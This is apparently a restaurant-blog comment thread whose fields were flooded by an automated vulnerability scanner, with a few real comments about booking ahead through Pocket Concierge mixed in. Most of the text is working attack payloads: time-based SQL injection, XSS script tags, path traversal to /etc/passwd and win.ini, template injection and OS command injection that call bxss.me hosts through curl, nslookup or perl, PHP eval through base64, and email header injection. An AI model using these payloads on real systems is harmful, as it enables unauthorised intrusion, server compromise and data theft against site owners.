re: Eric Yu
HttP://bxss.me/t/xss.html?%00
re: Eric Yu
"||sleep(27*1000)*rjtsew||"
re: Eric Yu
bxss.me/t/xss.html?%00
re: Eric Yu
"+"A".concat(70-3).concat(22*4).concat(109).concat(69).concat(102).concat(73)+(require"socket"
Socket.gethostbyname("hitqj"+"wxfahhywa514e.bxss.me.")[3].to_s)+"
re: Eric Yu
'+'A'.concat(70-3).concat(22*4).concat(111).concat(70).concat(104).concat(89)+(require'socket'
Socket.gethostbyname('hitsf'+'ensavgwgc15bf.bxss.me.')[3].to_s)+'
re: Eric Yu
'A'.concat(70-3).concat(22*4).concat(110).concat(69).concat(109).concat(71)+(require'socket'
Socket.gethostbyname('hitoe'+'hxkqlqtx5b140.bxss.me.')[3].to_s)
re: Eric Yu
'"
re: Eric Yu
replies
re: Eric Yu
<!--
re: Eric Yu
replies�
re: Eric Yu
replies/.
re: Eric Yu
'"()&%<zzz><ScRiPt >9M9s(9467)</ScRiPt>
re: Eric Yu
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitqradyturjiffabc.bxss.me")}}
re: Eric Yu
'"()&%<zzz><ScRiPt >9M9s(9079)</ScRiPt>
re: Eric Yu
9768359
re: Eric Yu
2x88G4KY
re: Eric Yu
*1
re: Eric Yu
*1
re: Eric Yu
*1
re: Eric Yu
*1
re: Eric Yu
-1 OR 5*5=25 --
re: Eric Yu
-1 OR 5*5=26 --
re: Eric Yu
-1 OR 5*5=25
re: Eric Yu
-1 OR 5*5=26
re: Eric Yu
*if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
-1 waitfor delay '0:0:15' --
re: Eric Yu
n4aHRKdm'; waitfor delay '0:0:15' --
re: Eric Yu
-1 OR 817=(SELECT 817 FROM PG_SLEEP(15))--
re: Eric Yu
-1) OR 56=(SELECT 56 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 229=(SELECT 229 FROM PG_SLEEP(15))--
re: Eric Yu
B3Z3CJem' OR 482=(SELECT 482 FROM PG_SLEEP(15))--
re: Eric Yu
LagFTE6E') OR 805=(SELECT 805 FROM PG_SLEEP(15))--
re: Eric Yu
rCF4F4UX')) OR 437=(SELECT 437 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
'"
re: Eric Yu
@@69j7f
re: Eric Yu
(select 198766*667891)
re: Eric Yu
(select 198766*667891 from DUAL)
@Eric, foreigners can actually book 90 days ahead of time using pocket concierge. And for foreigners that have been there before, actually they will take down your names and you are actually allowed to make it even much earlier in advance, definitely earlier than the 4 months booking window.
@Justeat You can just try your luck messaging them in ig. They are quite responsive.
re: guest
LYhfXSOo
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+455-455-1=0+0+0+1
re: guest
-1 OR 3+455-455-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
ekm0JZ3C'; waitfor delay '0:0:15' --
re: guest
-5 OR 273=(SELECT 273 FROM PG_SLEEP(15))--
re: guest
-5) OR 162=(SELECT 162 FROM PG_SLEEP(15))--
re: guest
-1)) OR 531=(SELECT 531 FROM PG_SLEEP(15))--
re: guest
30WdY0Np' OR 254=(SELECT 254 FROM PG_SLEEP(15))--
re: guest
DvsDdmG3') OR 479=(SELECT 479 FROM PG_SLEEP(15))--
re: guest
kJIz782c')) OR 592=(SELECT 592 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@RsgWU
re: guest
1IMoJUzr
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+289-289-1=0+0+0+1
re: guest
-1 OR 3+289-289-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
FnFrGfxG'; waitfor delay '0:0:15' --
re: guest
-5 OR 802=(SELECT 802 FROM PG_SLEEP(15))--
re: guest
-5) OR 516=(SELECT 516 FROM PG_SLEEP(15))--
re: guest
-1)) OR 902=(SELECT 902 FROM PG_SLEEP(15))--
re: guest
tcwBNIDy' OR 146=(SELECT 146 FROM PG_SLEEP(15))--
re: guest
oL0cGZ4H') OR 956=(SELECT 956 FROM PG_SLEEP(15))--
re: guest
53EGJXTY')) OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@njZVj
re: guest
17SXHKZV90
re: guest
response.write(9744111*9245190)
re: guest
'+response.write(9744111*9245190)+'
re: guest
"+response.write(9744111*9245190)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${10000125+10000150}
re: guest
../
re: guest
)
re: guest
redirtest.acx
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
echo kflksm$()\ mzgxil\nz^xyu||a #' &echo kflksm$()\ mzgxil\nz^xyu||a #|" &echo kflksm$()\ mzgxil\nz^xyu||a #
re: guest
&echo qnhiaz$()\ opzgwm\nz^xyu||a #' &echo qnhiaz$()\ opzgwm\nz^xyu||a #|" &echo qnhiaz$()\ opzgwm\nz^xyu||a #
re: guest
'.gethostbyname(lc('hitou'.'gcpwvfek46c44.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(78).chr(110).chr(80).'
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
|echo znbftb$()\ rutzbe\nz^xyu||a #' |echo znbftb$()\ rutzbe\nz^xyu||a #|" |echo znbftb$()\ rutzbe\nz^xyu||a #
re: guest
".gethostbyname(lc("hitip"."udocfkuv160f6.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(66).chr(113).chr(82)."
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
expr 9000124628 - 921039
re: guest
gethostbyname(lc('hitey'.'rljcqkfx06f3d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(89).chr(115).chr(73)
re: guest
/etc/shells
re: guest
(nslookup -q=cname hitbgbbmagmgh20ac2.bxss.me||curl hitbgbbmagmgh20ac2.bxss.me))
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
$(nslookup -q=cname hitpeolgviqdu9a216.bxss.me||curl hitpeolgviqdu9a216.bxss.me)
re: guest
c:/windows/win.ini
re: guest
&nslookup -q=cname hitpxzdgwnvrmbc305.bxss.me&'\"`0&nslookup -q=cname hitpxzdgwnvrmbc305.bxss.me&`'
re: guest
bxss.me
re: guest
&(nslookup -q=cname hitvnnnobrzbv7dd30.bxss.me||curl hitvnnnobrzbv7dd30.bxss.me)&'\"`0&(nslookup -q=cname hitvnnnobrzbv7dd30.bxss.me||curl hitvnnnobrzbv7dd30.bxss.me)&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
|(nslookup -q=cname hitqdlxefycli5d122.bxss.me||curl hitqdlxefycli5d122.bxss.me)
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
`(nslookup -q=cname hitoyjtdnkvmzfd2e8.bxss.me||curl hitoyjtdnkvmzfd2e8.bxss.me)`
re: guest
;(nslookup -q=cname hitfmdpsvtrts4e0c0.bxss.me||curl hitfmdpsvtrts4e0c0.bxss.me)|(nslookup -q=cname hitfmdpsvtrts4e0c0.bxss.me||curl hitfmdpsvtrts4e0c0.bxss.me)&(nslookup -q=cname hitfmdpsvtrts4e0c0.bxss.me||curl hitfmdpsvtrts4e0c0.bxss.me)
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitfnngqnwueb790d4.bxss.me||curl${IFS}hitfnngqnwueb790d4.bxss.me)
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
';print(md5(31337));$a='
re: guest
'"()
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hithhqrrsggmzb91bd.bxss.me||curl${IFS}hithhqrrsggmzb91bd.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hithhqrrsggmzb91bd.bxss.me||curl${IFS}hithhqrrsggmzb91bd.bxss.me)&`'
re: guest
bxss.me/t/xss.html?%00
re: guest
";print(md5(31337));$a="
re: guest
'&&sleep(27*1000)*vrsqte&&'
re: guest
"+"A".concat(70-3).concat(22*4).concat(116).concat(90).concat(111).concat(81)+(require"socket"
Socket.gethostbyname("hitzf"+"qrxezgmxbef70.bxss.me.")[3].to_s)+"
re: guest
${@print(md5(31337))}
re: guest
"&&sleep(27*1000)*vumlxq&&"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(115).concat(82).concat(101).concat(86)+(require'socket'
Socket.gethostbyname('hithm'+'viziyvto7ce85.bxss.me.')[3].to_s)+'
re: guest
${@print(md5(31337))}\
re: guest
'||sleep(27*1000)*trfyey||'
re: guest
'A'.concat(70-3).concat(22*4).concat(110).concat(79).concat(106).concat(86)+(require'socket'
Socket.gethostbyname('hitun'+'zzcgdawe891f6.bxss.me.')[3].to_s)
re: guest
'.print(md5(31337)).'
re: guest
"||sleep(27*1000)*gcgyms||"
re: guest
replies
re: guest
'"
re: guest
replies�
re: guest
<!--
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >Mn5s(9326)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hittsycrbezeu46f4a.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >Mn5s(9351)</ScRiPt>
re: guest
9260251
re: guest
jQuEkgBb
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
SowRckAr'; waitfor delay '0:0:15' --
re: guest
-1 OR 785=(SELECT 785 FROM PG_SLEEP(15))--
re: guest
-1) OR 80=(SELECT 80 FROM PG_SLEEP(15))--
re: guest
-1)) OR 486=(SELECT 486 FROM PG_SLEEP(15))--
re: guest
CpvULin3' OR 515=(SELECT 515 FROM PG_SLEEP(15))--
re: guest
GO8to3L9') OR 197=(SELECT 197 FROM PG_SLEEP(15))--
re: guest
Q5clCeIM')) OR 170=(SELECT 170 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@pVDLY
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Ahh yep. My apologies, 3 months in advance - slip of the finger.
I say it's relatively hard to book only because I've had 2 friends try and fail, though potentially they just got unlucky with dates.
In any case, it's definitely worth try for and the detour.
re: Eric Yu
qRrs2gLH
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+604-604-1=0+0+0+1
re: Eric Yu
-1 OR 3+604-604-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
jWXLfFzO'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 546=(SELECT 546 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 476=(SELECT 476 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 217=(SELECT 217 FROM PG_SLEEP(15))--
re: Eric Yu
5UIPATTl' OR 181=(SELECT 181 FROM PG_SLEEP(15))--
re: Eric Yu
1fqHjm1E') OR 676=(SELECT 676 FROM PG_SLEEP(15))--
re: Eric Yu
r6XwKnpU')) OR 782=(SELECT 782 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
pvbBzWfF
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1'"
re: Eric Yu
-1 OR 2+724-724-1=0+0+0+1
re: Eric Yu
-1 OR 3+724-724-1=0+0+0+1
re: Eric Yu
@@z5QLB
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
nNfv1t6b'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 949=(SELECT 949 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 623=(SELECT 623 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 238=(SELECT 238 FROM PG_SLEEP(15))--
re: Eric Yu
nW3U6kdC' OR 694=(SELECT 694 FROM PG_SLEEP(15))--
re: Eric Yu
WcTULJGM') OR 385=(SELECT 385 FROM PG_SLEEP(15))--
re: Eric Yu
RX83NhRI')) OR 985=(SELECT 985 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@4N41N
re: Eric Yu
1cntkBNlIO
re: Eric Yu
response.write(9677550*9887765)
re: Eric Yu
'+response.write(9677550*9887765)+'
re: Eric Yu
"+response.write(9677550*9887765)+"
re: Eric Yu
%0abcc:074625.67-21736.67.1a10c.19990.2@bxss.me
re: Eric Yu
to@example.com>%0d%0abcc:074625.67-21749.67.1a10c.19990.2@bxss.me
re: Eric Yu
../../../../../../../../../../../../../../etc/passwd
re: Eric Yu
<esi:include src="http://bxss.me/rpb.png"/>
re: Eric Yu
../../../../../../../../../../../../../../windows/win.ini
re: Eric Yu
file:///etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../../proc/version
re: Eric Yu
${9999811+9999436}
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Eric Yu
../../../../../../../../../../etc/passwd%00.jpg
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Eric Yu
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Eric Yu
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Eric Yu
echo riqrcm$()\ fdqxtj\nz^xyu||a #' &echo riqrcm$()\ fdqxtj\nz^xyu||a #|" &echo riqrcm$()\ fdqxtj\nz^xyu||a #
re: Eric Yu
/etc/passwd
re: Eric Yu
&echo iizfql$()\ zlfysd\nz^xyu||a #' &echo iizfql$()\ zlfysd\nz^xyu||a #|" &echo iizfql$()\ zlfysd\nz^xyu||a #
re: Eric Yu
%2fetc%2fpasswd
re: Eric Yu
|echo cslnmk$()\ yuqtmu\nz^xyu||a #' |echo cslnmk$()\ yuqtmu\nz^xyu||a #|" |echo cslnmk$()\ yuqtmu\nz^xyu||a #
re: Eric Yu
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Eric Yu
(nslookup hitamwqpoojae1f262.bxss.me||perl -e "gethostbyname('hitamwqpoojae1f262.bxss.me')")
re: Eric Yu
)
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Eric Yu
$(nslookup hitiojczmxctgf07af.bxss.me||perl -e "gethostbyname('hitiojczmxctgf07af.bxss.me')")
re: Eric Yu
!(()&&!|*|*|
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Eric Yu
&nslookup hitvrpfxczjrl52eed.bxss.me&'\"`0&nslookup hitvrpfxczjrl52eed.bxss.me&`'
re: Eric Yu
^(#$!@#$)(()))******
re: Eric Yu
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Eric Yu
&(nslookup hitrxpctizrql756c4.bxss.me||perl -e "gethostbyname('hitrxpctizrql756c4.bxss.me')")&'\"`0&(nslookup hitrxpctizrql756c4.bxss.me||perl -e "gethostbyname('hitrxpctizrql756c4.bxss.me')")&`'
re: Eric Yu
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Eric Yu
|(nslookup hitbrefdbwnkw8a1fa.bxss.me||perl -e "gethostbyname('hitbrefdbwnkw8a1fa.bxss.me')")
re: Eric Yu
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Eric Yu
`(nslookup hitcdrmhkushxeb4f8.bxss.me||perl -e "gethostbyname('hitcdrmhkushxeb4f8.bxss.me')")`
re: Eric Yu
file:///etc/passwd
re: Eric Yu
;(nslookup hitzegranwvyxd57c2.bxss.me||perl -e "gethostbyname('hitzegranwvyxd57c2.bxss.me')")|(nslookup hitzegranwvyxd57c2.bxss.me||perl -e "gethostbyname('hitzegranwvyxd57c2.bxss.me')")&(nslookup hitzegranwvyxd57c2.bxss.me||perl -e "gethostbyname('hitzegranwvyxd57c2.bxss.me')")
re: Eric Yu
/\../\../\../\../\../\../\../etc/passwd
re: Eric Yu
/WEB-INF/web.xml
re: Eric Yu
'.gethostbyname(lc('hitvq'.'mkosorwifb13b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(77).chr(119).chr(70).'
re: Eric Yu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Eric Yu
C:\WINDOWS\system32\drivers\etc\hosts
re: Eric Yu
".gethostbyname(lc("hitmd"."ngtisllm3b88e.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(70).chr(119).chr(65)."
re: Eric Yu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Eric Yu
../../../../../../../../../../windows/win.ini%00.jpg
re: Eric Yu
Http://bxss.me/t/fit.txt
re: Eric Yu
/../../../../../../../../../../boot.ini
re: Eric Yu
http://bxss.me/t/fit.txt%3F.jpg
re: Eric Yu
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Eric Yu
/etc/shells
re: Eric Yu
..\..\..\..\..\..\..\..\windows\win.ini
re: Eric Yu
c:/windows/win.ini
re: Eric Yu
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Eric Yu
bxss.me
re: Eric Yu
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Eric Yu
HttP://bxss.me/t/xss.html?%00
re: Eric Yu
"+"A".concat(70-3).concat(22*4).concat(116).concat(69).concat(120).concat(87)+(require"socket"
Socket.gethostbyname("hitpa"+"dlebapws87607.bxss.me.")[3].to_s)+"
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Eric Yu
bxss.me/t/xss.html?%00
re: Eric Yu
'+'A'.concat(70-3).concat(22*4).concat(117).concat(79).concat(105).concat(72)+(require'socket'
Socket.gethostbyname('hithr'+'gsbxipum8130a.bxss.me.')[3].to_s)+'
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Eric Yu
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.